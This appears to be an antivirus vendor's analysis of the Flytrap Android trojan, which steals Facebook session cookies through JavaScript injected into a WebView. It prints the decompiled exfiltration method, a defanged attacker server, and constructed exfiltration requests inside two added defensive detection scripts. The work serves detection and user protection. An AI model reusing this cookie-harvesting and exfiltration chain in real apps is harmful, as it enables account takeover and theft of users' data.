General Explanation

Type: Trojan

Degree of destruction: average

Prevalence: average

What is a Trojan?

Trojans are a type of malware that present themselves as harmless, legitimate software and behave like a useful application, but perform damaging actions on the system once executed. They reach the system through software downloaded from the internet, embedded HTML content, email attachments, and similar routes. Unlike viruses and computer worms, Trojans do not self-replicate.

What is Flytrap malware?

The main goal of this malware is to take over the victim's social media accounts, primarily Facebook. It is distributed as seemingly useful applications through Google Play and through unofficial stores, under attractive names such as free Netflix coupons, Google AdWords coupon codes, and voting apps for choosing the best soccer team or player. Users who install one of these applications are sent to the Facebook login page under some pretext, such as voting or collecting a coupon or credit. The malware does not forge the page; it hijacks the session: JavaScript injected into the login WebView captures the account details and the Facebook session cookies, which are sent to the attacker's server. Data collected from the device, including the value it reports as the user's location, is also used to target the advertisements the application displays.


Technical Explanation


This sample is published on Android stores under the name "Free Netflix Coupon". After installation, the main activity shows the message "Receive Free Netflix Coupon". Tapping "Receive Coupon" immediately starts CouponActivity, which is hidden from the user and consists of a WebView. The attacker uses JavaScript injection in this WebView: it loads its own JavaScript into the page so that the genuine Facebook login page is shown and the user's account data can be collected as it is entered.



First, the malware checks the WebView cookie store (CookieManager) to determine whether the user has already logged in to Facebook. If not, it shows the Facebook login page inside the WebView. This is not a fake page and its URL is the genuine one, but the malicious JavaScript injected into the WebView harvests critical data without the user noticing. Once the user submits the real Facebook login form, the collected data is sent as JSON to the malware's server:

Email, FacebookID, FeatureImage (profile picture URL), Location, UserAgent, Cookie, Ip, Date, Token, fromApp (name of the application)

Note that the value sent as "Location" in this code path is the device's default display language (Locale.getDefault().getDisplayLanguage()), as the decompiled method below shows; the separate GPS collection is described later.

private final void CouponActivity.getDataIntent()             //method@782d
{
    // URL used to look up Facebook cookies (Constant.URL_GET_COOKIE_FACEBOOK); the
    // decompiler did not recover the string constant, so it appears here as "".
    String v1 = "";
    // The decompiler rendered this null check as "!getCookie(v1)"; if the WebView
    // holds no cookies for the Facebook URL the user never logged in, so there is nothing to steal.
    if (CookieManager.getInstance().getCookie(v1) == null) {
        return;
    }
    String v7 = CookieManager.getInstance().getCookie(v1);            // Facebook session cookies
    Intrinsics.checkNotNullExpressionValue(v7, "getInstance().getCookie(com.emranul.movieinfo.util.Constant.URL_GET_COOKIE_FACEBOOK)");

    // Values harvested by the injected JavaScript arrive through the Intent extras
    String v6 = this.getIntent().getStringExtra("user_agent");
    String v3 = this.getIntent().getStringExtra("user_id");
    String v12 = this.getIntent().getStringExtra("email");
    if (v6 == null || v12 == null || TextUtils.isEmpty(v6) || TextUtils.isEmpty(v3) || TextUtils.isEmpty(v7) || TextUtils.isEmpty(v12)) {
        return;
    }

    // The "location" field is really the device display language
    String v5 = Locale.getDefault().getDisplayLanguage();
    Intrinsics.checkNotNullExpressionValue(v5, "getDefault().getDisplayLanguage()");
    // R.string.app_name becomes the "fromApp" field
    String v11 = this.getResources().getString(0x7f0f001b);
    Intrinsics.checkNotNullExpressionValue(v11, "resources.getString(R.string.app_name)");

    // Data(idFacebook, featureImage, location, userAgent, cookie, ip, date, token, fromApp, email);
    // "()" is the profile-picture base URL, which the decompiler did not recover.
    // The decompiler named this object v2 at construction and v0 below; it is the same object.
    Data v0 = new Data(v3, () + "" + v3 + "/picture?type=large", v5, v6, v7, this.getIpAdress(), ShareUtils.INSTANCE.getCurrentDate(), "Empty", v11, v12);

    // Exfiltration through Retrofit (rendered by the decompiler as null_saveData / null_enqueue)
    RetrofitBuilder.INSTANCE.getApiService().saveData(v0.getIdFacebook(), v0.getFeatureImage(), v0.getLocation(), v0.getUserAgent(), v0.getCookie(), v0.getIp(), v0.getDate(), v0.getToken(), v0.getFromApp(), v0.getEmail()).enqueue(new CouponActivity$getDataIntent$1(this));
}
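The chain that makes this activity dangerous is not any single API call but the combination shown above: a JavaScript-enabled WebView, script injected into a page under facebook.com, a read of the WebView cookie jar, and an HTTP client to carry the result out. The following static triage script, added here as an example and not part of the original analysis or of the sample, scans decompiled Java/Kotlin text for exactly that combination and only flags a file when the whole chain is present. The indicator names, regular expressions, verdict rule and the two source snippets it is run on are this example's own constructions.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Indicator names, patterns and the verdict rule are this example's own choices,
# not taken from the Flytrap sample or from Padvish.
INDICATORS = {
    "js_enabled":   re.compile(r"setJavaScriptEnabled\(\s*true\s*\)"),
    "js_injection": re.compile(r"evaluateJavascript\(|loadUrl\(\s*.javascript:"),
    "js_bridge":    re.compile(r"addJavascriptInterface\("),
    "cookie_read":  re.compile(r"CookieManager\.getInstance\(\)\.getCookie\("),
    "facebook_url": re.compile(r"https?://(?:m\.|www\.)?facebook\.com"),
    "http_client":  re.compile(r"\bretrofit2\.|\bokhttp3\.|\bHttpURLConnection\b"),
}


@dataclass
class Finding:
    indicator: str
    line_no: int
    text: str


def scan(source: str) -> list[Finding]:
    """Return every indicator hit in the decompiled source, with its line number."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def verdict(findings: list[Finding]) -> bool:
    """Flag only the full chain: script gets into the Facebook page (injection or a
    JS bridge), the cookie jar is read, and an HTTP client exists to exfiltrate."""
    hit = {f.indicator for f in findings}
    injects = "js_injection" in hit or "js_bridge" in hit
    return injects and {"cookie_read", "facebook_url", "http_client"} <= hit


# Constructed decompiled-source snippets for the example (not from the sample).
SUSPICIOUS_SOURCE = """
class CouponActivity extends AppCompatActivity {
    void onCreate() {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.loadUrl("https://m.facebook.com/login");
    }
    void onPageFinished(WebView view, String url) {
        view.evaluateJavascript(HOOK_JS, null);
        String cookie = CookieManager.getInstance().getCookie("https://www.facebook.com");
        retrofit2.Call<Void> call = api.saveData(cookie, email);
    }
}
"""

# A legitimate app hands the login to the browser (Custom Tabs) and never sees cookies.
BENIGN_SOURCE = """
class LoginActivity extends AppCompatActivity {
    void openLogin() {
        new CustomTabsIntent.Builder().build().launchUrl(this, Uri.parse("https://www.facebook.com/login"));
    }
}
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SOURCE), ("benign", BENIGN_SOURCE)):
        hits = scan(src)
        print(label, "->", "FLAG" if verdict(hits) else "clean",
              sorted({f.indicator for f in hits}))
```

Run it over a directory of decompiled sources (jadx or similar output) by calling scan() per file; a facebook.com URL on its own is expected in plenty of legitimate apps, which is why the verdict insists on the cookie read and the injection together.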



The malware uses the Retrofit library to connect to its server and to send and receive data in JSON format.

The Data object also carries a "token" field, described by the original analysis as an OAuth access token for the account; in this code path it is populated with the literal string "Empty" before the request is sent. After all of the values listed above have been collected, the malware serializes them (Data is a Kotlin data class, so its toString() below shows the field order) and sends them to its server at: hxxp[:]//quanlysanpham[.]Work


public String Data.toString() {
    return "Data(idFacebook=" + this.idFacebook + ", featureImage=" + this.featureImage + ", location=" + this.location
        + ", userAgent=" + this.userAgent + ", cookie=" + this.cookie + ", ip=" + this.ip + ", date=" + this.date
        + ", token=" + this.token + ", fromApp=" + this.fromApp + ", email=" + this.email + ")";
}
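On the network side, the ten field names sent by the Retrofit call above are a usable signature: no legitimate request to Facebook carries the user's own session cookie as a form or JSON field, let alone to a third-party host. The script below, an added example that is not part of the original analysis or of the sample, parses raw HTTP requests (as a proxy or capture would hand them over), extracts the body field names from JSON or form-encoded bodies, and flags a POST that carries most of that field set, including "cookie", to a host outside facebook.com. The request texts, the payload values, the threshold MIN_MATCH and the helper names are this example's own constructions.

```python
from __future__ import annotations
import json
from urllib.parse import parse_qs, urlencode

# Field names come from the Data getters in the decompiled code; everything else
# below (requests, values, threshold) is constructed for this example.
EXFIL_FIELDS = {"idFacebook", "featureImage", "location", "userAgent",
                "cookie", "ip", "date", "token", "fromApp", "email"}
MIN_MATCH = 6  # tolerate variants that drop or rename a few fields


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, host, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "host": headers.get("host", ""),
            "headers": headers, "body": body}


def body_fields(req: dict) -> set[str]:
    """Top-level field names of a JSON or x-www-form-urlencoded body."""
    ctype = req["headers"].get("content-type", "")
    try:
        if "json" in ctype:
            data = json.loads(req["body"])
            return set(data) if isinstance(data, dict) else set()
        if "x-www-form-urlencoded" in ctype:
            return set(parse_qs(req["body"], keep_blank_values=True))
    except ValueError:
        pass
    return set()


def is_facebook_host(host: str) -> bool:
    name = host.split(":")[0].lower()
    return name == "facebook.com" or name.endswith(".facebook.com")


def is_exfil(req: dict) -> bool:
    """A POST carrying the Flytrap field set (with the cookie) to a non-Facebook host."""
    fields = body_fields(req)
    return (req["method"] == "POST"
            and len(fields & EXFIL_FIELDS) >= MIN_MATCH
            and "cookie" in fields
            and not is_facebook_host(req["host"]))


# Constructed payload in the shape the sample builds; values are placeholders.
_PAYLOAD = {
    "idFacebook": "100001234567890",
    "featureImage": "https://example.invalid/100001234567890/picture?type=large",
    "location": "English",                      # display language, as in the sample
    "userAgent": "Mozilla/5.0 (Linux; Android 10)",
    "cookie": "sessionid=REDACTED; other=REDACTED",
    "ip": "203.0.113.7",
    "date": "2021-08-01",
    "token": "Empty",
    "fromApp": "Free Netflix Coupon",
    "email": "victim@example.com",
}
EXFIL_JSON = ("POST /api/saveData HTTP/1.1\r\nHost: quanlysanpham.work\r\n"
              "Content-Type: application/json\r\n\r\n" + json.dumps(_PAYLOAD))
EXFIL_FORM = ("POST /api/saveData HTTP/1.1\r\nHost: quanlysanpham.work\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + urlencode(_PAYLOAD))
# The user's genuine login submission to Facebook must not be flagged.
LEGIT_LOGIN = ("POST /login HTTP/1.1\r\nHost: m.facebook.com\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
               + urlencode({"email": "victim@example.com", "pass": "REDACTED"}))

if __name__ == "__main__":
    for label, raw in (("json exfil", EXFIL_JSON), ("form exfil", EXFIL_FORM), ("login", LEGIT_LOGIN)):
        req = parse_request(raw)
        print(f"{label:11} -> {req['host']:22} {'ALERT' if is_exfil(req) else 'ok'}")
```

The check deliberately keys on the field set rather than on the server name, since the hostname is the cheapest thing for the operator to rotate; the Facebook domain allow-list is what keeps the victim's real login form from tripping the rule.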


Another function of this malware is accessing the user's location in order to target advertisements through advertising services such as Google Ads. The application is scheduled to collect the device's longitude and latitude at fixed intervals. To serve the advertisements it obtains the device's advertising ID through the Google Play Services AdvertisingIdClient API (the library method below; the original analysis refers to it as the InstanceID API) and uses ad identifiers hard-coded in the application.

public static AdvertisingIdClient$Info AdvertisingIdClient.getAdvertisingIdInfo(Context p0)             //method@7a8f
{
    // Google Play Services library code, called by the malware to obtain the advertising ID.
    // zzb reads the library's feature flags ("gads:..."); register names are the decompiler's.
    zzb v0 = new zzb(p0);
    boolean v1 = v0.getBoolean("gads:ad_id_app_context:enabled", false);
    AdvertisingIdClient v3 = new AdvertisingIdClient(p0, -1, v1, v0.getBoolean("gads:ad_id_use_persistent_service:enabled", false));

    long start = SystemClock.elapsedRealtime();
    AdvertisingIdClient$Info info = v3.getInfo();    // advertising ID plus the limit-ad-tracking flag
    // Report the lookup timing to the library's metrics; the decompiler rendered the elapsed-time
    // argument as elapsedRealtime()-elapsedRealtime() and reused p0/v0 for the result and the client.
    v3.zza(info, v1, v0.getFloat("gads:ad_id_app_context:ping_ratio", 0), SystemClock.elapsedRealtime() - start, v0.getString("gads:ad_id_use_shared_preference:experiment_id", ""), null);

    return info;
}


How to deal with this malware and disinfect the system

Install and update the Padvish Antivirus database file, then scan your device to make sure it is not infected by this malware. Because the malware steals the Facebook session cookies and not only the password, also change the Facebook password and log out all active sessions from the account's security settings; the stolen cookies remain valid until those sessions are ended.

How to prevent the device from infection:

  1. Avoid downloading and installing applications from unofficial sources and stores.
  2. Review the permissions an application requests when installing it; a coupon or voting app has no reason to need location access.
  3. Back up files and stored data regularly.
  4. Do not use unofficial versions of applications. Many unofficial builds of applications such as Instagram and Telegram are distributed through Telegram channels.
